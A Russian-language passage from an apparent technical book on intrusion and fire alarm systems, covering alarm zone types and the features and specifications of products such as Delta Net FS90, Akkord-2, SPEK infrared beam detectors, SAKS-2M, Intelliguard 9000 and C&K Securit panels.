В состоянии тревоги производится выдача тревожных извещений путем замыкания или размыкания контактов выходных реле системы (и подключенного к ним охранного шлейфа) или путем передачи модулированных ВЧ сигналов по линиям связи на пульты охраны и включения исполнительных устройств и извещателей (сирен, прожекторов, автодозвонщиков и т. п.). Передача модулированных ВЧ сигналов производится с помощью аппаратуры высокочастотного уплотнения типа «Атлас-3», «Атлас-6» и т. п. по занятым телефонным линиям связи на пульты охранных систем типа «Фобос», «Нева» и т. п.
В состоянии тревоги одной из зон система фиксирует и заносит в память номер или адрес сработавшей зоны, время события и другую информацию. При этом остальные зоны продолжают находиться в режиме охраны. Из режима наблюдения в режим охраны зоны могут переводиться с контрольной панели вручную оператором или автоматически, по истечении определенного интервала времени, программируемого в широких пределах.
В случае использования многозоновой системы охраны существует возможность определения более или менее критических зон тревоги. Например, срабатывание зоны охраны внешнего периметра будет являться менее критической зоной тревоги, чем срабатывание зоны внутри помещения (например, срабатывание пожарных датчиков). При этом менее критические тревоги могут отменяться более критическими.
Режим входа/выхода необходим для организации перемещения по охраняемому объекту с целью выключения (включения) режима охраны. В этом режиме переход зон в состояние тревоги может происходить без задержки и с задержкой по времени. В первом случае система переходит в состояние тревоги сразу же после срабатывания зоны прохода (дверь, турникет и т. п.), причем восстановление зоны не приводит к отмене этого режима. Во втором случае переход системы в состояние тревоги происходит с временной задержкой (единицы-десятки секунд), что позволяет пользователю при входе отключить режим охраны до срабатывания системы, а при входе — заблокировать включение зон охраны и переход системы в состояние тревоги на время, необходимое для того, чтобы спокойно покинуть помещение. Время задержки может программироваться пользователем в широком диапазоне значений. В некоторых системах охраны предусматривается программирование маршрута прохода. Это позволяет включать временную задержку в нескольких зонах, расположенных на маршруте следования пользователя от входа до контрольной панели и обратно.
В зависимости от используемых датчиков система охраны состоит из зон, различных по своему функциональному назначению. Наиболее часто встречаются следующие типы зон:
> тревоги;
> нападения (кнопка тревоги);
> принуждения;
> круглосуточной (24 часа) охраны;
> вмешательства;
> прохода (входа/выхода).
Зона нападения представляет собой специально устанавливаемую или расположенную на клавиатурной панели кнопку тревоги, нажатие на которую переводит систему в состояние тревоги, независимо от того, в каком режиме работы она находилась до этого.
Зона принуждения (зона молчаливой тревоги) предназначена для перевода системы в состояние тревоги в том случае, когда пользователя путем насильственных действий принуждают отключить режим охраны. При этом система выдает тревожное извещение на пульт охраны без звуковой или световой сигнализации, имитируя снятие режима охраны.
Зона круглосуточной (24 часа) охраны предназначена для постоянной работы с использованием электроконтактных датчиков из фольги, детекторов битого стекла, датчиков пожарной сигнализации и т. п. Эта зона может находиться в режиме охраны круглосуточно, независимо от того, в каком режиме находятся другие зоны.
Зона вмешательства Tamper представляет собой набор датчиков вскрытия детекторов движения, битого стекла и линий установленного оборудования, которые срабатывают при попытке блокирования подключенных к системе видеокамер, датчиков, сирен и другого оборудования путем закорачивания или обрыва соединительных проводов, вскрытия корпусов или их перемещения (например, снятие со стены). При нарушении этой зоны в режиме наблюдения (система снята с охраны) срабатывает местная тревога (сирена, звонок). В остальных режимах дополнительно выдаются извещения на центральный пульт наблюдения установленным порядком.
Зона входа/выхода. Нарушение этой зоны в режиме охраны вызывает немедленную реакцию системы и переход ее из нормального состояния в состояние тревоги. Возможен режим, при котором зона входа/выхода переводит систему из нормального состояния в состояние тревоги с задержкой по времени.
2. 3. 1. Системы охранной сигнализации Delta Net
Семейство систем охранных сигнализаций Delta Net фирмы Honeywell (США), обеспечивающих охрану и безопасность, включает в себя обычные и интеллектуальные системы обнаружения и оповещения, системы охраны и ограничения доступа.
Система Delta Net FS90 F&S System (FS90) предназначена для обнаружения несанкционированных действий в стандартной и нестандартной зонах, в пересечении зон, для оповещения, контроля, наблюдения и сигнализации, управления отключением зон и подачи локальных звуковых сигналов. Функции охраны включают в себя непосредственное и дистанционное переключение режимов и высоконадежное наблюдение.
Система Delta Net FS90 Plus F&S System (FS90 Plus) предназначена для поддержки функций F&S по контролю и управлению конкретными охранными устройствами (а не только целыми зонами). Система FS90 Plus включает в себя до девяти интерфейсных плат интеллектуальных адресных шлейфов, каждая из которых поддерживает либо два двухжильных шлейфа, либо один устойчивый к неисправностям цепи четырехжильный шлейф. Каждый шлейф контролирует до 99 индивидуально адресуемых аналоговых датчиков и до 99 адресуемых пунктов контроля и управления, всего до 967 пунктов в одной системе.
Системы ограничения доступа контролируют до 8 устройств считывания магнитных карточек и (или) устройств набора кода (до 29). Система позволяет применять карточки, изготовленные по различным технологиям, допускает многоуровневый запрет повторного прохода, допуск в помещение только двух или более сотрудников одновременно, доступ только в присутствии оператора, управление лифтами.
Особенности системы:
> обычное и интеллектуальное обнаружение и сигнализация;
> автономное функционирование и (или) интеграция с системами более высокого уровня;
> конфигурирование в соответствии с конкретными требованиями;
> легко изменяемые файлы данных в энергонезависимой памяти;
> ограничение доступа и управление дверьми.
Система Delta Net FS90 F&S System
Система FS90 состоит из блока питания, батареи аварийного питания, системной платы с восемью слотами для установки функциональных плат и девятью клеммниками для подключения кабелей, управляющей платы (СА Control Board), которая может управлять четырьмя полностью оснащенными системными платами, и ряда функциональных плат для конкретных применений. Системная плата размещена в корпусе с запирающейся дверцей (рис. 2. 49).
Размещение всех компонентов в корпусе показано на рис. 2. 50. Корпус может быть одинарной или двойной вместимости и содержать одну или две системные платы соответственно.
Для контроля за целостностью системы управляющая плата каждые 24 часа вычисляет контрольную сумму файлов своей операционной системы и сравнивает ее со значением, полученным ранее, а тестирующие шлейфы генерируют сигналы тревоги в случае сбоя микропроцессора.
Рис. 2. 49 Система FS90
Оснащенная коммуникационной платой и соответственным образом подключенная, FS90 может служить для сбора данных в системах более высокого уровня. Если связь с такими системами потеряна, FS90 продолжает самостоятельно обеспечивать охрану и противопожарную безопасность.
Операционная система комплекса FS90 хранится в электрически программируемом ПЗУ. Пользователь может изменять значения параметров, используемых по умолчанию, с помощью переключателей на управляющей плате. В охраняемых зонах на контрольных панелях обеспечивается:
> индикация состояния тревоги или неисправности в зоне;
> отключение конкретной зоны охраны;
> проверка угрозы (временной интервал до 60 с);
Рис. 2. 50. Размещение компонентов в корпусе системы FS90
> повторное обнаружение;
> индикация тревоги или неисправностей по зонам охраны;
> -кодирование сигналов тревоги (от 20 до 120 гудков в минуту) для каждой охраняемой зоны;
> задержка подачи сигнала тревоги;
> отключение сигнала тревоги (до 8 минут).
Для дополнительной охраны системы от попыток получения несанкционированного доступа (НДС) к ней модуль, расположенный на конце линии, посылает закодированные сигналы, которые расшифровываются декодером на функциональной плате системы FS90. При несоответствии отправленных модулем кодов с хранящимися в памяти системы или при отсутствии сигналов от модуля срабатывает сигнализация.
Основные технические характеристики системы FS90:
Диапазон рабочих температур, С............................................ от 0 до 49
Влажность, %............................................................................... 5 — 95
Напряжение питания, В..................................................................... 28
Потребляемый ток:
в дежурном режиме не более, А....................................................... 2
в состоянии тревоги не более, А....................................................... 4
Система Delta Net FS90 Plus F&S System
Система FS90 Plus выполняет все функции системы FS90, а также ряд дополнительных. Она обрабатывает аналоговую информацию от тепловых и дымовых датчиков. Модули контроля типа ТС809А и ТС809В поддерживают работу шлейфа по контролю охранных, контрольных и противопожарных устройств. Пример шлейфа приведен на рис. 2. 51.
При коротком замыкании на участке шлейфа модуль изоляции ТС811А позволяет отключить его. При чем это не повлияет на работу остальных частей шлейфа.
Рис. 2. 51. Пример шлейфа FS90 Plus
FS90 Plus может находиться в трех режимах: охраны, наблюдения и неисправности. Имеется возможность определения адреса датчика и его состояния, а также регулировки порогов срабатывания датчиков и других параметров.
Для уменьшения ложных срабатываний FS90 Plus проводит контроль состояния детекторов, проверяет уровни сигналов аналоговых датчиков и по среднесуточному значению контролируемого параметра автоматически производит коррекцию их чувствительности.
Дополнительно на терминале более высокого уровня отображается информация об адресе устройства и его состоянии.
Система FS90 Plus Delta Net Graphic Central
Система охранно-пожарной сигнализации FS90 Plus Delta Net Graphic Central (с центральной графической системой — ЦГС) предоставляет, с одной стороны, такое экономное решение, как многоканальность, а с другой — всю мощь централизованной системы управления зданием. В автономном режиме панели FS90 Plus сами по себе обеспечивают надежную защиту. Одновременно они могут служить распределенными панелями коммуникации для центральной станции, что позволяет оператору получать дополнительную информацию и расширять функции управления зонами. Особенности системы:
> минимальные затраты при монтаже системы;
> превосходный интерфейс пользователя;
> мгновенное отображение на графическом дисплее информации по зданию;
> простота изменения конфигурации системы в соответствии с дополнительными требованиями;
> связь с другими системами управления зданием;
> надежная защита на местах.
ЦГС позволяет оператору просматривать, изменять и сохранять данные, передаваемые по комбинированной сети отдельными панелями сигнализации. Используя мощную компьютерную графику и программное обеспечение, персо-
Рис. 2. 52. Командный блок системы
нал, отвечающий за управление зданием и безопасность, может быстро оценить состояние системы, выполнить необходимые инструкции, выявить и устранить возникающие проблемы, а также вести архив данных.
Графический дисплей с высоким разрешением позволяет просматривать и оценивать информацию о состоянии системы. Цветное отображение информации облегчает определение состояния системы (норма, тревога, неисправность). Любая система семейства Delta Net F&S, независимо от того, работает она самостоятельно или соединена с ЦГС, может дополняться командным блоком (рис. 2. 52), в состав которого входят:
> жидкокристаллический дисплей для вывода текстовых сообщений о неисправностях и тревогах;
> принтер с термобумагой для распечатки данных;
> клавиатура для ввода команд и данных.
2.3.10. Прибор приемно-контрольныи охранно-пожарный «Аккорд-2»
Прибор предназначен для контроля восьми шлейфов сигнализации как в автономном режиме с подачей звукового и светового сигналов, так и с передачей тревожного извещения на пульт централизованного наблюдения по одной или двум выделенным или занятым телефонным линиям.
Прибор «Аккорд-2» является усовершенствованным вариантом прибора "Аккорд" с расширенными функциональными возможностями. Он применяется как автономная или централизованная система для охраны объектов (магазинов, офисов, сберкасс, складов, коттеджей, квартир и т. п.).
Режимы работы прибора:
> режим частичной охраны — контроль двух, четырех или шести ШС (пожарная и тревожная сигнализация);
> режим полной охраны — контроль всех восьми шлейфов;
> режим входа/выхода.
В этих режимах состояние тревоги сопровождается выдачей тревожного извещения при нарушении ШС или вскрытии прибора путем размыкания контактов реле или передачи модулированных ВЧ сигналов по системе «Атлас-3», «Атлас-б»; включением встроенной (12 В, 90 дБ) или внешней (220 В) сирен и внешнего светового оповещения (лампа 220 В).
Прибор обеспечивает задержку на включение оповешателей при входе и блокировку извещателей при выходе.
«Аккорд-2» имеет восемь шлейфов сигнализации, из них:
> ШС1, ШС2 — шлейфы охранной сигнализации с возможностью установки времени задержки включения звуковых и световых оповещателей;
> ШСЗ — ШС8 — шлейфы охранной или пожарной сигнализации с возможностью питания по шлейфу извещателей типа «Волна-5» (до 2-х штук), ДИП-3 (до 10 штук).
В шлейфы могут включаться магнитоконтактные датчики (СМК, ИП-105, ИО-102 и т. д.), извещатели с релейным выходом («Аргус», «Фотон», «Эхо» и т. п.) и извещатели с питанием по шлейфу ( «Окно», «Волна-5», ДИП-3 и т. п.).
Прибор имеет отдельный выход+ 12 В, рассчитанный на ток нагрузки 150 мА, для питания извещателей, а также встроенную сирену мощностью 100 дБ (+ 12 В, 0, 25 А).
Существует несколько вариантов работы прибора «Аккорд-2»:
> постановка на охрану с закрытой дверью с ограниченным временем выхода (30, 60 или 120с);
> постановка на охрану с открытой дверью с неограниченным временем выхода (до закрывания двери);
> при снятии с охраны после нарушения ШС1 время включения оповещателей может быть ограничено (30, 60 или 120 с).
Выбор вариантов происходит автоматически в зависимости от положения входной двери (шлейф ШС1).
Связь с ПЦН может осуществляться либо по четырем каналам — четыре релейных выхода; либо двум — два релейных выхода или два канала с высокочастотным уплотнением «Атлас-3»; либо по одному каналу с высокочастотным уплотнением «Атлас-6».
Для визуального контроля за состоянием системы служат индикаторы:
> текущего состояния и памяти тревог по каждому ШС;
> индикатор состояния встроенного аккумулятора (включается кнопкой «Контроль»);
> индикатор наличия напряжения питания 220 В:
> индикатор неотключаемой памяти тревог (12±6 мин) по ШС5 и ШС6 (тревожная сигнализация);
> выносные светодиодные индикаторы состояния и памяти тревог по каж дому ШС. К прибору подключаются различные звуковые и световые оповещатели:
> встроенная сирена (12В, 250 мА, 100 дБ);
> выносная сирена (12 В, до 300 мА; 220В, 40 ВхА);
> светодиодный блок выносных индикаторов;
> выносная лампа 220 В мощностью 25 Вт.
Питание прибора осуществляется от сети 220 В (+ 10%... -15%), 50 Гц. Имеется внешнее резервное питание+ 12 В или+ 24 В, а также встроенный аккумулятор емкостью 1 Ахч или 3 Ахч (24 часа работы) с автоматическим подзарядом и контролем разряда (время работы в режиме частичной охраны 8 часов).
2.3.11. Извещатели охранные линейные оптико-электронные фирмы СПЭК
Охранные извещатели "СПЭК-5" и «Вектор-СПЭК» предназначены для охраны периметров и закрытых помещений с использованием датчиков инфракрасного излучения (ИК). Сервисные функции приборов без проблем позволяют настроить датчики извещателя и контролировать их работоспособность в режиме охраны. Извещатели имеют достаточный запас по мощности, что позволяет им работать в условиях плохой видимости (больших оптических потерях, т. е. при дожде, снеге и тумане и т. п.). Извещатель выполнен на современной элементной базе, прост в установке и настройке, позволяет создавать многолучевые барьеры любой плотности в инфракрасном диапазоне. Приборы оборудованы защитным корпусом.
Основные характеристики приборов "СПЭК-5" и "Вектор-СПЭК":
Дальность действия на улице, м.................................................. 75—150
Коэффициент запаса по ИК энергии не менее.................................... 100
Сохранение работоспособности при оптических потерях, %.................... 99
Число И К лучей................................................................................ 1
Напряжение питания постоянного тока:
«Вектор-СПЭК», В.............................................................. 10, 2-30
«СПЭК-5», В....................................................................... 10, 8-27
Ток, потребляемый приемником и излучателем:
при Uпит=12 В не более, мА ............................................................30
при Uпит=24 В не более, мА ............................................................ 60
Помехоустойчивость к фоновой освещенности:
от электроосветительных приборов, лк.......................................... 500
от солнца, лк........................................................................... 10000
Чувствительность извещателя «Вектор-СПЭК», мс..................... 100—500
Длительность сигнала тревоги не менее, с............................................... 2
Диапазон рабочих температур,С........................................ от -40 до +55
Габаритные размеры:
"СПЭК-5", мм................................................................. 65х140х145
«Вектор-СПЭК»-, мм......................................................... 75х80х135
Масса излучателя и приемника:
«СПЭК-5» не более, кг ................................................................. 1,2
"Вектор-СПЭК" не более, кг ........................................................ 1,0
Устройства имеют дистанционный контроль функционирования. Благодаря широкому ИК лучу системы, требования к жесткости основания, на котором установлены датчики, минимальны.
Работоспособность извещателя на улице без подогрева оптики обеспечивается герметичным исполнением оптического узла излучателя и приемника, а также вентиляционной системой защитного корпуса.
Извещатель подключается к пульту, реагирующему на размыкание контактов реле на время не более 2 с.
Для точной юстировки оптических осей приемника и излучателя извещателя первый имеет выход «Контроль». Точной юстировке соответствует максимальное показание вольтметра постоянного тока, подключенного к выводам «Контроль» и "Uпит" приемника.
Для дистанционного контроля работоспособности прибора "СПЭК-5" - излучатель извещателя имеет вывод «Прерывание». Замыкание этого вывода на минус источника питания (-Uпит) выключает излучатель, что приводит к выдаче приемником сигнала тревоги. При использовании извещателя в составе компьютерной системы охраны данный режим позволяет осуществлять круглосуточную автоматическую проверку работоспособности извещателя путем регистрации соответствующего отклика реле приемника на команду компьютера «Прерывание».
Один извещатель перекрывает прямолинейный участок территории одним ИК лучом. Условие работоспособности устройства — наличие прямой видимости между излучателем и приемником.
Для блокировки периметра со стороной до 150 м однолучевым ИК барьером необходимо установить 4 излучателя и 4 приемника. Для охраны участка длиной более 150 м необходимо последовательно установить необходимое число извещателей, каждый из которых будет перекрывать участок до 150 м.
Наличие постороннего объекта в области потока ИК энергии не достаточно для формирования сигнала тревоги. Необходимым условием включения тревожной сигнализации прибора является перекрытие оптической оси (воображаемой прямой между оптическими осями излучателей и приемника), когда тень от объекта попадает на окно приемника извещателя (рис. 2.75).
Прибор "Вектор-СПЭК" позволяет устанавливать чувствительность прибора (t), что соответствует скорости пересечения ИК луча (V). Наглядно это показано на рис. 2.76.
Рис. 2.75. Условия формирования сигнала тревоги
Для регистрации несанкционированного перемещения в зоне охраны можно использовать один или несколько ИК лучей как в вертикальной (по высоте), так и в горизонтальной плоскостях, перекрывающих необходимую площадь или периметр территории, подступы к зданиям, воротам и т.д.
Рис. 2.76. Выбор времени помехозащищенности
Для построения охранного ИК барьера на практике используются несколько вариантов, каждый из которых предполагает применение одного или нескольких извещателей. В состав каждого извещателя (рис. 2.77) входит излучатель и приемник.
При создании однолучевого ИК барьера (рис. 2.78) используется один извещатель.
Рис. 2.77. Состав извещателя
Рис. 2.78. Однолучевой ИК барьер на извещателе «Вектор-СПЭК»
Устройство выдает сигнал тревоги при:
> пересечении И К луча на время, превышающее уровень установленной помехозащищенности;
> при оптических потерях более 99%;
> пропадании напряжения питания;
> нарушении юстировки датчиков;
> превышении фоновой освещенности.
При создании двухлучевого ИК барьера (рис. 2.79) используются два извещателя. Излучатели располагаются по одному с каждой стороны. При пересечении луча 1 приемник П1 выключает излучатель И2, луч 2 прерывается. Приемник П2 формирует сигнал тревоги, передаваемый по шлейфу сигнализации. Расстояние между ИК лучами может быть в пределах от 0,1 до 10 м.
Риc.2.79. Двухлучевой ИК барьер
Сигнал тревоги выдается при пересечении объектом любого ИК луча. Для организации многолучевого ИК барьера (более двух ИК лучей) необходимо иметь два извещателя и два дополнительных приемника (Пд). С каждой стороны (рис. 2. 80) барьера устанавливается по одному излучателю. Можно установить еще два (четыре) дополнительных приемника Пд и получить шести (восьми) лучевой ИК барьер. Расстояние D между датчиками обычно составляет 30—70 см. Сигнал тревоги выдается при пересечении объектом любого луча.
При создании четырехлучевого синхронного ИК барьера используются два извещателя "Вектор-СПЭК" (рис. 2. 81). Излучатели устанавливаются с одной
Рис. 2.80. Четырехлучевой ИК барьер
стороны барьера, а приемники — с другой. Излучатель И2 работает от синхроимпульсов излучателя И1 (синхронная работа излучателей двух извещателей).
Сигнал тревоги выдается при пересечении всех ИК лучей одновременно. Синхронная работа излучателей позволяет увеличить дальность действия устройства в 1, 2 раза. При установке излучателей И1 и И2 на расстоянии D=10... 35 см (приемники П1 и П2 установлены с другой стороны барьера) имеет место селекция объектов по габаритам. Например, если небольшой предмет (рука) перекрывает один или два ИК луча, —тревоги нет, а если предмет размером более 20—25 см перекрывает все ИК лучи, — тревога! Данная схема построения ИК барьера обеспечивает высокую помехозащищенность извещателя, осо-
Рис. 2. 81. Четырехлучевого ИК барьер на извещателе «Вектор-СПЭК»
бенно при листопаде или пролетах птиц ("СПЭК-5" не позволяет организовать
синхронный И К барьер).
Извещатель можно использовать совместно с телевизионными системами наблюдения . В этом случае по команде с извещателя включается монитор для визуальной оценки обстановки и (или) видеомагнитофон для протоколирования события. Одновременно можно включать прожекторы для подсветки, создавая отпугивающий эффект для правонарушителей и привлекающий внимание охраны.
Рис. 2.82 Извещатель «СПЭК-5»
Питание нескольких извещателей можно осуществлять как по одной линии,
так и раздельно. Допускается питание излучателя и приемника одного извещателя от разных. источников.
.Дистанционный контроль функционирования в приборе "Вектор-СПЭК" осуществляется при подаче на вход «Контроль функционирования» излучателя И1 положительного импульса длительностью t > 0,8 с.
Размыканиек контактов в шлейфе «Саботаж» (рис. 2.78) происходит при вскрытии корпуса датчиков извещателя, а также при уменьшении мощности ИК излучения в плохих метеоусловиях, что позволяет прогнозировать ложные тревоги.
Внешний вид извещателей "СПЭК-5" и "Вектор-СПЭК" приведены на рис. 2.82 и 2.84. Габаритные размеры извещателя "Вектор-СПЭК" представлены на рис. 2.83.
Рис. 2.83. Габаритные размеры извещателя «Вектор-СПЭК»
Рис. 2.84. Извещатель «Вектор-СПЭК»
2. 3. 2. Система безопасности САКС-2М
Система САКС-2М представляет собой устройство сбора и обработки информации, поступающей от различных средств обнаружения и контроля. К таким средствам относятся: охранные и пожарные датчики различных типов, ТВ камеры, электроуправляемые замки, освещение, вентиляция, системы пожаротушения, системы ограничения доступа и др.
В современной терминологии такие системы называют интегрированными, т. е. способными принимать сигналы и управлять всем спектром современных охранных устройств.
Система САКС-2М обеспечивает:
> точное определение места срабатывания любого средства обнаружения, выдачу звукового и светового сигнала, указание типа сработавшего устройства;
> регистрацию местоположения и времени срабатывания средств обнаружения и тревожных кнопок;
> контроль за состоянием коммуникационных линий и работоспособностью средств обнаружения;
> разнообразие способов постановки и снятия с охраны отдельных устройств или их групп;
> регистрацию всех событий, происшедших в системе, и возможность их просмотра за определенный промежуток времени;
> управление различными устройствами реагирования (блокировка дверей,
включение телекамер, систем пожаротушения, вентиляции и др.). САКС-2М — это программно-аппаратный комплекс, в состав которого входят: персональный компьютер IBM PC (с процессом не ниже Intel 386) с комплектом программ, приемная станция и адресные блоки на 6 зон (входов) каждый. Общее количество сигналов, принимаемых одной станцией, 1536.
Допускается использовать расширение до четырех одновременно работающих станций, что в итоге позволяет подключить к системе до 6144 перечисленных выше охранных устройств. В системе принята шлейфовая структура коммуникационных линий и передача сигнала в цифровой форме, что существенно упрощает ее монтаж.
Благодаря использованию в системе персонального компьютера, стандартные функциональные возможности подобных систем расширяются за счет используемого программного обеспечения. К таким возможностям относятся:
> получение поэтапных графических планов объекта охраны. На плане можно отобразить объект с прилегающей к нему территорией, подъезды к нему, поэтапные планы объекта, входы и выходы на этапах, план помещения и т. д.;
> вывод справочной информации о средстве обнаружения, рекомендаций по ликвидации создавшейся ситуации и любой другой полезной информации;
> ввод и хранение информации о принятых мерах и действиях персонала при возникновении тревожной ситуации;
> автоматическое управление различными устройствами реагирования без участия оператора;
> запись, обработка и анализ видеоизображений.
Программное обеспечение системы реализовано на языке Borland C++ под управлением операционной системы MS-DOS (версия 2. 0 и выше) для IBM совместимых компьютеров.
Максимальное число охраняемых помещений зависит от числа адресных датчиков, устанавливаемых в них. Под адресным датчиком подразумеваются собственно датчики и адресное устройство, обеспечивающее их идентификацию в сети.
Микропроцессорная логика позволяет работать системе без компьютера. При этом она может быть дополнительно укомплектована индикаторным светодиодным экраном или монитором, облегчающими работу оператора при отсутствии компьютера.
Вариант использования системы представлен на рис. 2. 53. Микропроцессорная логика, блочный подход к формированию аппаратной части, кодирование информации по уровням сложности делают систему весьма гибкой и адаптированной к широкому спектру объектов, начиная от мелких, на несколько десятков шлейфов, до очень крупных — на несколько тысяч шлейфов.
Удачные программные и аппаратные решения позволяют использовать любые типы датчиков, радиосвязь и реализовать охранные функции классическим способом (по проводам), предусмотрена возможность использования спутниковой связи, что позволяет оператору эффективно вести охрану объектов, расположенных на большой площади, с помощью мобильных патрулей.
Требуемая степень надежности системы достигается дублированием сложных блоков, т. е. ретранслятора и устройства сопряжения. В системе электропитания САКС-2М предусмотрено переключение источников питания: с сети переменного тока напряжением 220 В на питание от резервных аккумуляторов,
Рис. 2. 53. Вариант использования системы САКС-2М:
1 — охранные или пожарные датчики (любого типа); 2 — адресные устройства с шестью входами (1 — 32 на каждый шлейф); 3 — охранные шлейфы (8 шлейфов на 1 станцию); 4 — локальные приемные станции (1—8); 5 — центральная приемная станция; 6 — принтер; 7 — персональный компьютер
обеспечивающих непрерывную работу в течение не менее 72 часов. Основные технические характеристики системы САКС-2М:
Максимальное число адресов, обслуживаемых системой................... 12288
Максимальное число адресов на 1 локальную станцию..................... 1536
Количество шлейфов на 1 станции....................................................... 8
Максимальное число адресных устройств на 1 шлейф.......................... 32
Количество входов (адресов) на 1 адресное устройство......................... 6
Максимальное расстояние между станциями, м............................... 10000
Максимальная длина шлейфа, м....................................................... 500
Напряжение питания:
промышленная сеть, В........................................................ 220 ±15%
аккумуляторная батарея, В.................................................... 12± 10%
Напряжение в охранных шлейфах не более, В.................................. 13, 2
Напряжение в линии станция-станция не более, В................................ 27
Потребляемая мощность (1 станция) не более, Вт............................. 1150
Время передачи сигнала не более, с.................................................... 0, 5
2. 3. 3. Система охранной сигнализации Intelliguard 9000
Система охранной сигнализации Intelliguard 9000 фирмы Honeywell (США) разрабатывалась с единственной целью — удовлетворить потребности в охране учреждений максимально экономичным образом. Особенности системы:
> многофункциональная защита;
> охрана отдельных зон (до 8 зон);
> отдельные точки защиты (до 512 точек);
> доступ по коду (до 99 кодов);
> несколько центров управления (до 4 центров);
> локальное управление (до 8 клавиатур);
> независимые программируемые выходы (до 30 выходов).
Благодаря программному обеспечению, построенному по принципу зонального управления, Intelliguard 9000 подходит для любого типа помещений, вне зависимости от сложности структуры здания или расписаний.
Система поддерживает до восьми зон охраны, восьми локальных клавиатур управления, четырех командных центров управления, до 512 отдельных охранных точек, включая контакты дверей, кнопки тревоги и различные датчики, например датчики движения, температуры, ионизации и сейсмодатчики. При обнаружении тревоги система определяет зону, которая подверглась вмешательству. Скрупулезно выполненное программное обеспечение и надежность проверенных электронных компонентов делают эту систему уникальной. Гибкость является основным достоинством системы.
Рис. 2. 54. Пульт управления
Рис. 2. 55. Структурная схема системы Intelliguard 9000
Intelliguard 9000 может опознавать до 100 пользователей, идентифицируя их по коду доступа. Более того, каждый пользователь имеет персональный код, который он может изменять в любое время без предварительного предупреждения.
Охрана отдельных зон позволяет защищаться от внутренних и сторонних нарушений. В системе предусмотрена возможность брать под охрану и снимать с охраны до восьми различных зон здания независимо друг от друга, что позволяет осуществлять доступ в одну зону, в то время как остальные будут оставаться под охраной. Пульт управления системы представлен на рис. 2. 54. Любая зона охраны может быть связана с другой так, что охрана ее автоматически отключится при разрешении доступа в последнюю.
Чтобы не допустить несанкционированного использования системы, каждый раз при ее включении необходимо ввести персональный код доступа (идентификатор и собственно код). Для зон повышенной безопасности может использоваться двойной код доступа. Возможно назначение до 100 отдельных кодов доступа.
Структурная схема системы Intelliguard 9000 приведена на рис. 2. 55.
К одной панели можно подключить до четырех центров управления, что позволяет осуществлять контроль за системой из нескольких различных мест. Регистратор событий автоматически запоминает все события и идентификаторы пользователей для обеспечения контроля за ними. Все события запоминаются с указанием даты и времени. В период охраны отдельные точки можно отключить, сохранив защиту остальных точек. Каждое неисправное устройство включается индивидуально. Система имеет функцию тестирования своего состояния.
Пользователь может задавать время прохода из центра управления системы. В зависимости от требований к охране и расположения помещений задается локальный или контролируемый режим работы. Внешние устройства звуковой сигнализации могут устанавливаться снаружи здания для оповещения о срабатывании системы.
Система Intelliguard 9000 имеет резервное питание, которое осуществляется от аккумуляторной батареи и включается в случае сбоев в сетевом питании. Заряд батарей и контроль за его уровнем осуществляется с помощью двухуровневого зарядного устройства.
Основные технические характеристики системы:
Размеры:
блок управления, см........................................................... 37х27х7, 5
центр управления, см........................................................... 25х14х9
Напряжение питания:
первичное (50 Гц), В..................................................................... 26
вторичное (постоянное), В............................................................. 12
аккумуляторная батарея, Ахч.......................................................... 7
Протокол коммуникации............................................................. RS-485
Диапазон рабочих температур, °С.................................................. 0—49
Влажность при температуре 30°С, %............................................... 5—95
2. 3. 4. Охранные системы фирмы С&К Systems, Inc.
Фирма С&К Systems, Inc. (США) выпускает разнообразные системы охраны, выполненные с использованием последних достижений науки и техники.
Системы охраны включают в себя контрольные панели, клавиатуры, релейные блоки, источники питания, датчики движения и датчики битого стекла, сейсмодатчики, устройства передачи и приема данных по радиоканалу и телефонной линии. Более подробно рассмотрим несколько вариантов систем охраны С&К Systems.
Контрольные панели серии Securit 700L/703
Контрольные панели серии Securit 700L/703 — это удачный выбор для домашнего и коммерческого применения. Модель 700L предназначена для местных систем сигнализации. Модель 703 используется для местных систем сигнализации с 7 выходами контроля состояния системы. Внешний вид устройств показан на рис. 2. 56.
Особенности модели 700L
Семь проводных зон охраны: пять полностью программируемых, зона несанкционированного вмешательства и зона тревоги, включаемая с клавиатуры. Предварительное программирование функций зон не обязательно.
Программируемые функции зон. Каждая зона может быть запрограммирована на выполнение определенных функций: тревоги, прохода, тревоги или прохода в режиме частичной охраны, когда отключены только некоторые зоны, прохода в режиме полной охраны и прохода в режиме частичной охраны.
Компактная отдельная клавиатура. В системе может использоваться одновременно до трех клавиатур. Каждая клавиатура имеет откидную крышку, открывающую доступ к инструкции по управлению и клавишам с подсветкой.
Рис. 2. 56. Контрольные панели Securit 700L/703
Регулируемые временные задержки. Длительность времени доступа при входе/выходе программируется в интервале от 10 до 90 с. Время перехода в режим охраны из режима частичной охраны программируется в интервале от О до 90 с в зависимости от конкретных условий.
Запоминание 20 режимов, сохраняющихся в энергонезависимой памяти.
Режим охраны включает в себя режимы частичной и полной охраны, обеспечивающих удобство применения системы.
Два 4-разрядных кода для управления системой: код управления и код пользователя.
Особенности модели 703
Семь полностью программируемых зон, зона несанкционированного вмешательства и зона тревоги, включаемая с клавиатуры. Предварительное программирование функций зон не обязательно.
Компактная отдельная клавиатура (одновременно до 6 клавиатур на систему). Откидная крышка корпуса клавиатуры открывает доступ к инструкции по управлению и клавишам с подсветкой.
Программирование каждой зоны на выполнение одной из функций: тревоги, проход в режиме частичной и полной охраны, возможность использования дополнительных зон круглосуточной и пожарной охраны.
Регулируемые временные задержки входа/выхода программируются на время от 10 до 90 с. Задержка реагирования системы при проходе может программироваться на время от 0 до 90 с. Перевод системы в режим охраны может производиться по факту закрывания двери.
Запоминание 20 режимов, сохраняющихся при полном отключении питания и дополнительно 500 событий с протоколированием на бумаге с помощью принтера (в последнем случае необходима дополнительная оперативная память).
Семь электронных выходов контроля состояния системы предназначены для передачи информации о следующих событиях: нажатие кнопки включения тревоги, постановка/снятие с охраны, неисправность, программирование, разрешение доступа, несанкционированный доступ.
Четыре цифровых кода для управления системой: код управления и 3 кода пользователя, а также один 4-разрядный код включения режима охраны.
Повышенная информативность шлейфов с двумя оконечными резисторами. По одной паре проводов передаются два сигнала (тревоги и вмешательства).
Основные технические характеристики контрольных панелей Securit 700L/703'.
Типы шлейфов:
700L................................................................ нормально замкнутые
703................................................. с двумя оконечными резисторами
Основной источник питания, В.......................................................... 220
Резервный источник питания (7 Ахч), В.............................................. 12
Выход для подключения сирены (500 мА), В....................................... 12
Габаритные размеры, мм....................................................... 267х262х83
Вес, кг............................................................................................. 2, 7
Контрольные панели серии Securit 724/764
Контрольные панели Securit 724/764 предназначены для расширения зон охраны до 24 и 64 соответственно. Состав оборудования панелей показан на рис. 2. 57.
